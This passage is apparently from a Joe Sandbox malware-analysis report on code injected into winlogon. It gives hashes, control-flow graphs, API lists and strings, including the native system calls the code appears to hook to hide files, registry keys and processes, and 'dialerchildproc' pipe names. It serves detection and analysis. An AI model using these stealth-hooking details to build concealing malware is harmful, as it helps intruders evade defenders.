                                                                                                                            • Instruction Fuzzy Hash: 80113022714F5189EF00CFB0EC983A833A4F719758F840E26EA6D467A4DF78C5A88380
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                            • Instruction ID: a00ea222dca1409f8d46c6c733b36e0ca5c6caa6ab5bb61d15342de0a7c0de74
                                                                                                                            • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                            • Instruction Fuzzy Hash: 4851C6227107D089FF20DBB6AC8879EBBA5F744794F544216EE5C27BA5DB39CA41C700
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                            • Instruction ID: 20f132576345f14cf9ccd990e033f4922525e3259efa89c4df88ccd33cc2d552
                                                                                                                            • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                            • Instruction Fuzzy Hash: 1EF0FFB16156A48EDBA88FA8B85771A77A1F3483C4FD4811AD68D83E14D63CC461CF04
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 301f1f65bb1fbd330af1318079875eba76c63322ed64614214bec7ea4255b521
                                                                                                                            • Instruction ID: 985df637057a876432ca5168b9158af0903bded641ed0023591ab73756eca6e2
                                                                                                                            • Opcode Fuzzy Hash: 301f1f65bb1fbd330af1318079875eba76c63322ed64614214bec7ea4255b521
                                                                                                                            • Instruction Fuzzy Hash: B8E0ED9BA4EAE01AF7A24AB44CBF34C2F90F366B20F89408FCB94432D3D1064D018726

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction ID: e3e3399429e55960cf070cc16a5005b5190db7e605521ce6618ec048f68560e7
                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction Fuzzy Hash: BE517F76200B8486EB60CFA2E88879AB7A1F788FC9F844126DE4D07768DF3DC545CB10

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction ID: 9dee3d71542fb905587bd6568b7d178f2fe6f5c2276b71c2ce632fa0ceebaf95
                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction Fuzzy Hash: B731C2A5500ACAA0EF50EFE5ECD97D4B324BB04385FC09563A42D02179AF79CF49C7A0

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 462 2d016586910-2d016586916 463 2d016586918-2d01658691b 462->463 464 2d016586951-2d01658695b 462->464 465 2d01658691d-2d016586920 463->465 466 2d016586945-2d016586984 call 2d016586fc0 463->466 467 2d016586a78-2d016586a8d 464->467 468 2d016586938 __scrt_dllmain_crt_thread_attach 465->468 469 2d016586922-2d016586925 465->469 482 2d01658698a-2d01658699f call 2d016586e54 466->482 483 2d016586a52 466->483 470 2d016586a9c-2d016586ab6 call 2d016586e54 467->470 471 2d016586a8f 467->471 477 2d01658693d-2d016586944 468->477 473 2d016586931-2d016586936 call 2d016586f04 469->473 474 2d016586927-2d016586930 469->474 485 2d016586ab8-2d016586aed call 2d016586f7c call 2d016586e1c call 2d016587318 call 2d016587130 call 2d016587154 call 2d016586fac 470->485 486 2d016586aef-2d016586b20 call 2d016587190 470->486 475 2d016586a91-2d016586a9b 471->475 473->477 494 2d016586a6a-2d016586a77 call 2d016587190 482->494 495 2d0165869a5-2d0165869b6 call 2d016586ec4 482->495 487 2d016586a54-2d016586a69 483->487 485->475 496 2d016586b31-2d016586b37 486->496 497 2d016586b22-2d016586b28 486->497 494->467 514 2d0165869b8-2d0165869dc call 2d0165872dc call 2d016586e0c call 2d016586e38 call 2d01658ac0c 495->514 515 2d016586a07-2d016586a11 call 2d016587130 495->515 502 2d016586b39-2d016586b43 496->502 503 2d016586b7e-2d016586b94 call 2d01658268c 496->503 497->496 501 2d016586b2a-2d016586b2c 497->501 508 2d016586c1f-2d016586c2c 501->508 509 2d016586b4f-2d016586b5d call 2d016595780 502->509 510 2d016586b45-2d016586b4d 502->510 523 2d016586bcc-2d016586bce 503->523 524 2d016586b96-2d016586b98 503->524 517 2d016586b63-2d016586b78 call 2d016586910 509->517 527 2d016586c15-2d016586c1d 509->527 510->517 514->515 565 2d0165869de-2d0165869e5 __scrt_dllmain_after_initialize_c 514->565 515->483 535 2d016586a13-2d016586a1f call 2d016587180 515->535 517->503 517->527 525 2d016586bd0-2d016586bd3 523->525 526 2d016586bd5-2d016586bea call 2d016586910 523->526 524->523 532 2d016586b9a-2d016586bbc call 2d01658268c call 2d016586a78 524->532 525->526 525->527 526->527 544 2d016586bec-2d016586bf6 526->544 527->508 532->523 559 2d016586bbe-2d016586bc6 call 2d016595780 532->559 552 2d016586a21-2d016586a2b call 2d016587098 535->552 553 2d016586a45-2d016586a50 535->553 549 2d016586bf8-2d016586bff 544->549 550 2d016586c01-2d016586c11 call 2d016595780 544->550 549->527 550->527 552->553 564 2d016586a2d-2d016586a3b 552->564 553->487 559->523 564->553 565->515 566 2d0165869e7-2d016586a04 call 2d01658abc8 565->566 566->515
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: dd7692e2b99b60a86f76d6b3ad3452ab25c272ff970cedf1c1e1e01c02871081
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: 8B81B1616102E186FB50ABE7DCDD3592298EB85B88FD48027AA4D47FB7DB38CD458720

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 569 2d016616910-2d016616916 570 2d016616951-2d01661695b 569->570 571 2d016616918-2d01661691b 569->571 572 2d016616a78-2d016616a8d 570->572 573 2d016616945-2d016616984 call 2d016616fc0 571->573 574 2d01661691d-2d016616920 571->574 578 2d016616a9c-2d016616ab6 call 2d016616e54 572->578 579 2d016616a8f 572->579 591 2d016616a52 573->591 592 2d01661698a-2d01661699f call 2d016616e54 573->592 576 2d016616922-2d016616925 574->576 577 2d016616938 __scrt_dllmain_crt_thread_attach 574->577 582 2d016616931-2d016616936 call 2d016616f04 576->582 583 2d016616927-2d016616930 576->583 580 2d01661693d-2d016616944 577->580 589 2d016616ab8-2d016616aed call 2d016616f7c call 2d016616e1c call 2d016617318 call 2d016617130 call 2d016617154 call 2d016616fac 578->589 590 2d016616aef-2d016616b20 call 2d016617190 578->590 584 2d016616a91-2d016616a9b 579->584 582->580 589->584 601 2d016616b31-2d016616b37 590->601 602 2d016616b22-2d016616b28 590->602 595 2d016616a54-2d016616a69 591->595 604 2d0166169a5-2d0166169b6 call 2d016616ec4 592->604 605 2d016616a6a-2d016616a77 call 2d016617190 592->605 607 2d016616b39-2d016616b43 601->607 608 2d016616b7e-2d016616b94 call 2d01661268c 601->608 602->601 606 2d016616b2a-2d016616b2c 602->606 622 2d016616a07-2d016616a11 call 2d016617130 604->622 623 2d0166169b8-2d0166169dc call 2d0166172dc call 2d016616e0c call 2d016616e38 call 2d01661ac0c 604->623 605->572 612 2d016616c1f-2d016616c2c 606->612 613 2d016616b45-2d016616b4d 607->613 614 2d016616b4f-2d016616b5d call 2d016625780 607->614 630 2d016616b96-2d016616b98 608->630 631 2d016616bcc-2d016616bce 608->631 619 2d016616b63-2d016616b78 call 2d016616910 613->619 614->619 634 2d016616c15-2d016616c1d 614->634 619->608 619->634 622->591 644 2d016616a13-2d016616a1f call 2d016617180 622->644 623->622 672 2d0166169de-2d0166169e5 __scrt_dllmain_after_initialize_c 623->672 630->631 639 2d016616b9a-2d016616bbc call 2d01661268c call 2d016616a78 630->639 632 2d016616bd0-2d016616bd3 631->632 633 2d016616bd5-2d016616bea call 2d016616910 631->633 632->633 632->634 633->634 653 2d016616bec-2d016616bf6 633->653 634->612 639->631 665 2d016616bbe-2d016616bc6 call 2d016625780 639->665 661 2d016616a21-2d016616a2b call 2d016617098 644->661 662 2d016616a45-2d016616a50 644->662 658 2d016616c01-2d016616c11 call 2d016625780 653->658 659 2d016616bf8-2d016616bff 653->659 658->634 659->634 661->662 671 2d016616a2d-2d016616a3b 661->671 662->595 665->631 671->662 672->622 673 2d0166169e7-2d016616a04 call 2d01661abc8 672->673 673->622
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: b7fad54de8152518f9edab8cf547b60603a1147b6fb5ed7f09f5639719b823ef
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: 4181B0697002E186FB50ABE59CDD36926E0ABC7780FD8852FA90DC77B6DB38CD458700
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 000002D0165ECE37
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECE4C
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECE6D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECE9A
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECEAB
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECEBC
                                                                                                                            • SetLastError.KERNEL32 ref: 000002D0165ECED7
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF0D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,000002D0165EECCC,?,?,?,?,000002D0165EBF9F,?,?,?,?,?,000002D0165E7AB0), ref: 000002D0165ECF2C
                                                                                                                              • Part of subcall function 000002D0165ED6CC: HeapAlloc.KERNEL32 ref: 000002D0165ED721
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF54
                                                                                                                              • Part of subcall function 000002D0165ED744: HeapFree.KERNEL32 ref: 000002D0165ED75A
                                                                                                                              • Part of subcall function 000002D0165ED744: GetLastError.KERNEL32 ref: 000002D0165ED764
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF65
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0A6B,?,?,?,000002D0165F045C,?,?,?,000002D0165EC84F), ref: 000002D0165ECF76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 570795689-0
                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction ID: 6cb119c879d4005e3e486556fd0f16809afcb4c169a1b85a080ac9ab7b906ee7
                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction Fuzzy Hash: D14162212016C546FF69A7F95DDE369E2425B447B0FD4472BB83E0A7F6DE2ACE418200
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction ID: 27c92a905a2f4f6f1a7d1a88f5f4c691c2a465980edda73e2f7a22435be0af33
                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction Fuzzy Hash: 92212F3661479082FB108B65F88875977A5F789BA5F904216EA5D03BB8DF7CC949CF00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                            • Instruction ID: 8d33458c817a64122548c589ceefed1e9e6f3c6a843f5d4004e67bc5e997e060
                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                            • Instruction Fuzzy Hash: 16E170726057808AEB60DFAAD8C839D77B8F755B98F900116EE8D57FA6CB34C991C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction ID: 3b43c7ab403b83ca95457f37da0d4b500b38ba5a1a126430ff915fab710d6147
                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction Fuzzy Hash: 7BE14C72A047C08AEF60DFB5988839DB7A0F755798F900117EE8D57BA9CB36CA91C740
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                            • Instruction ID: a2a3fd78db194ff4db1db09d07f917027e0369e1bd98e7c59f7a79fbd41e88f4
                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                            • Instruction Fuzzy Hash: 87E17372604BC086EB60DFA5D8C839D77A0F796B98F94421EDE8D57BA5CB34C991C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction ID: d0c3c69c08ddd6f5c27ead1c77a57a672af2ad5f3c132c9258f8044c477055ab
                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction Fuzzy Hash: D0410622311A9091FF16CFEAAD88756A395B744BE0FC4412B9D4E877A4EE3ECE458310
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction ID: 60b4ca63da48bf83ee31c643dec68d0684812f94169e8e12275eb22dcfa7cc50
                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction Fuzzy Hash: F4416273614BC4C6EB64CFA1E88879EB7A1F388B99F448116DA8D07768DF39C945CB40
                                                                                                                            APIs
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED087
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0A6
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0CE
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0DF
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D0165EC7DE,?,?,?,?,?,?,?,?,000002D0165ECF9D,?,?,00000001), ref: 000002D0165ED0F0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value
                                                                                                                            • String ID: 1%$Y%
                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction ID: 7080bbce82f1be4da0ddcc39a1ebc959a46846a47c0639f49ef077fcb6817628
                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction Fuzzy Hash: F51133617042C442FF6857ED5DDD369E2415B447F0FD84327A83E466FAEE2ACE428600
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 190073905-0
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: cc22ab156fd64d921cb8bab48c84aed77748f638e97627413a858d82ffff3ace
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: 2E819F216007C186FF50ABE5ACC93B9E690EB85784FD4442BEA4D477B6EB3ACE45C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                            • String ID: api-ms-
                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction ID: aca1f05cb46fc00515c66d976e56b7ae3e88fb2388c081806b711800b0246c42
                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction Fuzzy Hash: 5031B821312BD1D1EF15DBD2AC88755A3A4B748BA0FD909279E1D477B0EF3ACA558310
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                            • String ID: CONOUT$
                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction ID: d628bd0090cde46b23efa145587aed2904a5f36c40d9d109057e4cb8b91bb961
                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction Fuzzy Hash: 71118F31310BD086E7508BA2EC88719B6A4F788FE5F944266EE5E877B5CF78CC148744
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID: dialer
                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction ID: a1042e87f8364f6b2e966bad11af8e790b8d99eaa053b685ef812c5dffe2a578
                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction Fuzzy Hash: 6531B522701B9186EB14CF96DD88769B7A0FB44BC0F8881229E4C47B75EF3ACD618700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
